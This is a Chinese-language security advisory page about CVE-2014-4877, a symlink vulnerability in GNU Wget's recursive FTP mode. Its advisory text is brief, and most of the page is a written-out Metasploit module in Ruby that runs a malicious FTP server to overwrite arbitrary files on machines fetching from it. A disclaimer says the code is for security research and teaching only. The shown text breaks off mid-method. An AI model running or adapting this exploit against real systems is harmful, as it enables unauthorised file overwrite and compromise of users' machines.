GNU Wget符号链接漏洞(CVE

发布日期：2014-10-27
更新日期：2014-10-29

受影响系统：
GNU wget
描述：
BUGTRAQ  ID: 70751
 CVE(CAN) ID: CVE-2014-4877

GNU Wget是一个免费的软件包，用于使用HTTP、HTTPS和FTP协议检索文件。

GNU Wget在实现上存在符号链接漏洞，攻击者可利用此漏洞访问受限制目录以外的文件，获取敏感信息，执行其他攻击。

Linux wget命令详解

Linux 下使用 wget/aria2 进行离线迅雷批量下载

Linux使用wget请求地址时报错

Linux下载命令wget使用详解

wget 使用大全

Linux 命令行下载工具 wget 的使用技巧

<*来源：vendor
  *>

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::FtpServer
  include Msf::Auxiliary::Report

def initialize
    super(
      'Name'          => 'GNU Wget FTP Symlink Arbitrary Filesystem Access',
      'Description'    => %q{
        This module exploits a vulnerability in Wget when used in
        recursive (-r) mode with a FTP server as a destination. A
        symlink is used to allow arbitrary writes to the target's
        filesystem. To specify content for the file, use the
        "file:/path" syntax for the TARGET_DATA option.

Tested successfully with wget 1.14. Versions prior to 1.16
        are presumed vulnerable.
      },
      'Author'        => ['hdm'],
      'License'        => MSF_LICENSE,
      'Actions'        => [['Service']],
      'PassiveActions' => ['Service'],
      'References'    =>
        [
          [ 'CVE', '2014-4877'],
          [ 'URL', 'https://bugzilla.RedHat.com/show_bug.cgi?id=1139181' ],
          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access' ]
        ],
      'DefaultAction'  => 'Service',
      'DisclosureDate' => 'Oct 27 2014'
    )

register_options(
      [
        OptString.new('TARGET_FILE', [ true,  "The target file to overwrite", '/tmp/pwned' ]),
        OptString.new('TARGET_DATA', [ true,  "The data to write to the target file", 'Hello from Metasploit' ]),
        OptPort.new('SRVPORT', [ true, "The port for the malicious FTP server to listen on", 2121])
      ], self.class)

@fakedir = Rex::Text.rand_text_alphanumeric(rand(8)+8)
  end

def run
    my_address = Rex::Socket.source_address
    print_good("Targets should run: $ wget -m ftp://#{my_address}:#{datastore['SRVPORT']}/")
    exploit()
  end

def on_client_command_user(c,arg)
    @state[c][:user] = arg
    c.put "331 User name okay, need password...\r\n"
  end

def on_client_command_pass(c,arg)
    @state[c][:pass] = arg
    c.put "230 Login OK\r\n"
    @state[c][:auth] = true
    print_status("#{@state[c][:name]} Logged in with user '#{@state[c][:user]}' and password '#{@state[c][:user]}'...")
  end

def on_client_command_retr(c,arg)
    print_status("#{@state[c][:name]} -> RETR #{arg}")

if not @state[c][:auth]
      c.put "500 Access denied\r\n"
      return
    end

unless arg.index(::File.basename(datastore['TARGET_FILE']))
      c.put "550 File does not exist\r\n"
      return
    end